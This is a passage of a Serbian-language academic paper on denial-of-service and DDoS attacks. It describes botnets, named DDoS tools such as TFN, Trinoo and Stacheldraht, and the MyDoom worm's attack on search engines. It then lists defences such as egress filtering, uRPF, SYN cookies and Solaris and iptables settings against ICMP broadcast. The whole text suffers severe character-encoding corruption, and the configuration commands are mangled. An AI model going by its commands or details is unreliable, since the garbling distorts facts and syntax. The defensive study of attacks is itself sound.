korisniki/ mre-a kao Ato je 0omcast iz me(narodni/ )odr(ja ( kojima se *ako ()ada (sisteme Airoko)ojasnog )renosa$ Sasvim )o*ako, korisnicima Airom sveta )ostaja*o je jasno darad ( de*jenom okr(-enj( kao Ato je 1nternet nije dovo*jno o.ez.eivati i odr-avati samoso)stveni s3stem$ 5tvreno je da z*o()otre.*jeni sistemi, )o)(*arno zvani zom.iji, inficiranisrazmerno s*o-enim softverom i ( )oetk( s( takvi sistemi nazivani DDoS k*ijenti$ 'ojedinik*ijenti s( nosi*i i )ose.na imena *ribe !lood Neto%rk#*rinoo StacheldrahtI$ 5 skorije vreme,)rogrami koji s( s*(-i*i za da*jinsko ()rav*janje zom.ijima nazvani s( .ootovi, )oAto s( seo)se-ni os*anja*i na te/nike a(tomatskog da*jinskog ()rav*janja i istoimene skri)tove koriA+eneza (s*(g( interaktivne kom(nikacije na 1nternet( 4+nternet @elay 'hatI$ 5s*(ga@elay 'hatje defacto )osta*a da*jinski ()rav*jaki kana* za zom.i mre-e$ Or()a zom.ija )od ()ravom jednogra(nara do.i*a je naziv zom.i mre-a i*i .otCarmija$ 5)rav*jaki ra(nar o.ino i sam

z*o()otre.*jen I mogao je tako da itave *egije dr(gi/ sistema (smeri na .om.ardovanje ci*jnogra(nara i*i mre-e S>9 )aketima i*i dr(gim ,,or(-jima DoS na)ada$ 'rocenjena ve*iina)ostoje+i/ zom.i mre-a varira, )oev od neko*iko stotina do "!!!! sistema$ 5s*ed efekta)ojaanja DDoS na)ada i mre-a od samo neko*iko stotina ra(nara )ostaje veoma o)asna$6anas s(DDoS na)adi dostig*i taj nivo da se zom.i mre-e mog( iznajm*jivati )o (merenimcenama$ Svako ko danas )*anira da za)one )os*ovanje )reko mre-e mora .iti svestan rizika odmog(+i/DDoSna)ada )a mora )red(zeti odgovaraj(+e mere zaAtite svoji/ res(rsa$

8


30/38


*atke za )red(zimanje DDoSna)ada sta*no se razvijaj(, )a nije mog(+e iscr)no i/ o.(/vatiti$Me( a*atkama za izvoenjeDDoS na)ada s( *ribe !lood Net%orkA *rinooA Stacheldraht *!N/?A 2in*rinooA Shaft i mStreams#

*atka *!Nje )rva Fin(Y=5niY a*atka za distir.(irano na)adanja koja se mog*a javno)re(zeti$ 'rogram *!N ima i k*ijentsk( i serversk( kom)onent(, Ato na)ada( omog(+ava da

insta*ira server na (da*jenom ra(narskom sistem( i da jednom komandom izdatom k*ijent(za)one sveo.(/vatan distri.(iran na)ad ( ci*j( (skra+ivanj( (s*(ga$ 'rogram je s)oso.an zaizvoenje razni/ vrsta na)ada izme( osta*og 10M', Sm(rf, 56' na)ada i S>9 )o)*ava$


31/38


Oore je to Ato +e ovakav na)ad )ro+i ne)rime+eno ( organizaciji koja je sva sredstva(*o-i*a ( od.ran( od masivni/ DoS na)ada s mi*ionima za/teva ( sek(ndi i Ato +e tim zaodr-avanje sistema .iti anga-ovan na otkrivanj( )ravog (zroka na)ada$

9ajve+i )retra-ivai na 1nternet( )retr)e*i ( !!# ()ravo DoS na)ad na s*oj a)*ikacija$4oje ( stvari .io DDoSA)oAto je .io izveden sa )rocenjeni/ desetak /i*jada ra(nara zara-eni/

raz*iitim varijantama ra(narskog crva M36oom, koji se (mno-avao tako Ato je s*ao svojeko)ije na eCadrese )ronaene na ove etiri *okacije$ 9a svak( adres( koj( je )ronaAao na ve+zara-enom ra(nar(, M36oom je koriste+i njegov domen, s*ao ()ite )retra-ivaima da .i)ronaAao dodatne eCadrese ( istom domen($ Sve etiri na)adn(te *okacije s( .i*e nedost()netokom na)ada$

1ako se o)isani incident te/niki mo-e o.jasniti aktivnoA+( /i*jade ra(nara koji s(istovremeno s*a*i za/teve )retra-ivaima, znaajn( (*og( ( o.aranj( ti/ *okacija ima*a sama)riroda za/teva$ Dasno je da s( za/tevi koje s( s*a*i crv i njegovi )otomci .i*i za/tevni$ 9aravnoscenario ,,s(dnjeg dana .i mogao o.(/vatiti kom.inacij( s*anja teAki/ za/teva i efekta)ojaanjaDDS-a#'oAto se svet ve+ s(oio sa efektomDoSna)ada na s*oj a)*ikacija )itanje jevremena kad +e (s*editi veoma (smereni ra(narski na)adi$


32/38


4 M-*- za@:i:- o# DoS na$a#a

&.og ne(/vat*jive )rirode DoS na)ada njima se tre.a s()rostaviti svim ras)o*o-ivimsredstvima, kao Ato s( jaanje ot)ornosti sistema, otkrivanje na)ada i aktivno odgovaranje nanjega$ 9ijedna od ti/ mera nikada ne+e .iti sto)rocentno efikasna, a*i ako se koriste ()oredomo-e da se ra(na na )o)ri*in( .ez.ednost sistema$

4.1 O#vrt na prakti&nu #tranu pro*lema

DoSna)adi se nikad ne mog( ( ce*ini iz.e+i$ 9aj.o*ja mera za smanjenje rizika je sta*noodr-avanje naj.o*jeg mog(+eg nivoa (s*(ga za najve+i .roj korisnika$

4.2 Supro#tavljanje "oS napadima

4.2.1 +nti,"oS proi-vodi

ko se mre-a koristi (mereno i*i esto, a to je od ve*ikog znaaja za o.av*janje )os*ova,tre.a*o .i koristiti nek( od gotovi/ te/no*ogija za .*okiranje DoSna)ada kao Ato s( 'isco Euardi*i *op .ayer$

4akoe se koriste te/nike za .*okiranje i*i znatno ograniavanje (o.iajeni/DoSna)adakao Ato s( )*av*jenje S>9 )aketima i )*av*jenje *egitimnim H44' za/tevima za (s)ostav( veze$

4.2.2 Planiranje kapa)iteta

Mre-ni ka)aciteti .i tre.a*i da se )*aniraj( tako da zadr-e DoS na)ade ono*iko d(go

ko*iko to do)(Ataj( finansije )redviene za od.ran( od na)ada$ Mo-e se, naime, dogoditi na)ad isa viAe mi*iona )aketa ( sek(ndi$

4.2.3 Saradnja #a davao)em Internet u#luga

&aAtita same mre-e je (za*(dna ako s( davaoci 1nternet (s*(ga na)adn(ti$


33/38


ogon prefi; i*i adresa je )(tanja koja nikad ne .i tre.a*a da se )ojavi ( ta.e*i za r(tiranje$'aket nikad ne .i tre.a*o da ima izvoriAn( adres( koja je na .ogon *isti$ 4o s( najeA+e izvoriAneadrese zaDDoS na)ad$

@i*triranje iz*aznog sao.ra+ajaKada .i svi davaoci 1nternet (s*(ga (gradi*i jednostavno fi*triranje od*aznog sao.ra+aja DoS

na)adi .i )redstav*ja*i mnogo manj( )retnj($ @i*triranjem od*aznog sao.ra+aja s(Atinski ses)reava da fa*sifikovani 1' )aketi na)(ste mre-($ 9aj.o*je je da se na 1nternet( o.jave is)ravneizvoriAne adrese, a zatim da se .*okira od*azni sao.ra+aj koji )otie sa .i*o koje dr(ge adrese$

1sk*j(ivanje mog(+nosti (smerenog dif(znog 1' emitovanja6a .i se (k*oni*a mog(+nost koriA+enja *okacije kao )ojaivaa na)ada isk*j((je se na

graninom (smeriva( f(nkcija (semrenog dif(znog emitovanja 0isco no ip directed-broadcastI$

5graivanje jednosmernog (smeravanja )aketa is)itivanjem izvoriAta:nicast @eversePah !or%ardingA@P!I

Kada se na interfejs( aktivira jednosmerno G'@ (smeravanje, (smeriva )roverava da *i se

izvoriAne adrese i interfejsi )aketa )rim*jeni/ na interfejs( na*aze ( ta.e*i za (smeravanje i da *ise odrediAni interfejs ( )aket( )ok*a)a sa interfejsom na koji je stigao$ 9a taj nain se sao.ra+ajisti od )aketa sa izmenjenim i*i mo-da fa*sifikovanim izvoriAnim adresama$


34/38


Stalno auriranje sistemaSig(rnost zavisi od toga da *i se radi sa najsve-ijom verzijom 1' steka koj( je )on(dio)roizvoa sistemaJ

Sistemska zaAtita od S>9 na)ada

Ze+ina o)erativni/ sistema ima ve+ (graene me/anizme za otkrivanje i s)reavanje)*av*jenja S19 )aketima$ &.og toga Ato s( S>9 na)adi najeA+i za ov( vrst( na)adasmiA*jena s( i dr(ga reAenja$ Fin(ks ima o)cij( S>9cookiekoja kada je aktivirana otkriva i.e*e-i mog(+e SFN na)ade$ Microsoft ima me/anizam me/anike )odrAke koji kada se redekanja za )ovezivanje )o)(ni do odreene (na)red zadate granice sistem a(tomatskidode*j(je nove res(rse$ 9a taj nain se red ekanja nikad ne zag(A(je$

stale sistemske konfiguracije$9eki sistemi se mog( )odesiti da od.ac(j( ne(smerene 10M' )akete U0H< koje generiA(na)adi ti)a Smurf i*i!raggle$

o 6a .i sisteme So*aris s)rei*i da ne odgovaraj( na ne(smerene U0H< za/teve, (

datotek( =etc=rc$d=S;Einet se dodaje red:

ndd -setdevipipGrespondGtoGechoGbroadcast !

o 6a .i se Fin(Y s)reio da odgovara na ne(smerene U0H< za/teve, aktivira sezaAtitna .arijera na nivo( jezgra$ 'aketi sa zaAti+enim .arijerama s(:

1) ta.*esJ

+p tables H( +NP:* -p icmp Hd "6/#"7


35/38


4.2.6 0e#tiranje #i#tema na "oS napad

're)or(*jivo je da se infrastr(kt(ra na)adne onako kako .i to (inio z*onameran /akerda .i se )roverio sistem od.rane$

4.3 Otkrivanje "oS napada

&aista ne .i .i*o do.ro da o DoS na)ad( korisnici saznaj( )re administratora$


36/38


4.4.2 Po-ovite #vog davao)a Internet u#luga i ugovorite praenje

ko vaAa *okacija )retr)i na)ad, tre.a odma/ st()iti ( vez( sa centrom za mre-ne o)eracije svogdavaoca 1nternet (s*(ga i )ok(Aati otkriti izvor na)ada$Zeoma je teAko (+i ( trag (*jez( a*i nijenemog(+e$ Zi i vaA davaoc 1nternet (s*(ga tre.a da tesno sara(jete, jer s( esto nji/ovi korisnicinenamerni (esnici DDosna)ada$ &.og toga +e ti davaoci o.ino *akAe mo+i da fi*triraj(

sao.ra+aj koji na)(Ata nji/ove mre-e, nego vi koji ste samo ( )ri*ici da nas*e)o fi*trirate (*aznisao.ra+aj$ ko i sami )r(-ate 1nternet (s*(ge, tre.a da vam je )ri r(ci s)isak 9


37/38


F Ba)%j09a)&*onamerni korisnici mog( da )okren( vrste DoS na)ada kako .i ome*i norma*no

izvrAavanje (s*(ga$ DDoS na)adi (smereni na iscr)*jivanje )ro)(snog o)sega najnovija s(o)asnost, jer s( ( stanj( da skroman inicija*ni sao.ra+aj )ojaaj( do mere ( kojoj on (gro-ava)os*ovanje na mre-i$

Kako mre-na trgovina do.ija sve va-nije mesto (n(tar naAe e*ektronske )rivrede, tako (DoSna)adi is)o*javaj( sve ve+i (ticaj na nj($ Mnoge organizacije danas svoj )ri/od sti((g*avnom )reko mre-e, )a i/ o)se-ni DoS na)adi mog( dovesti do .ankrota$ i )os*e svega,im)*ikacije kojeDoS na)adi mog( da imaj( ( vojnim o)eracijama ne smej( .iti za.orav*jenje$Mnoge dr-ave, (mesto da troAe sredstva na konvenciona*no or(-je, ojaavaj( svoje s)oso.nosti

za e*ektronsko ratovanjeDoSna)adima$

8"


38/38


7 Li:-*a:0*a

`" S$Mc0*(re,D$Scam.ra3, O$ K(rtz Hakerske tajne: zaAtita mre-ni/ Sistema` B$orevi+, 6$'*eskonji+,9$Maek

Documents

Napadi Na Racunarske Sisteme u Cilju Uskracivanja Mreznih Usluga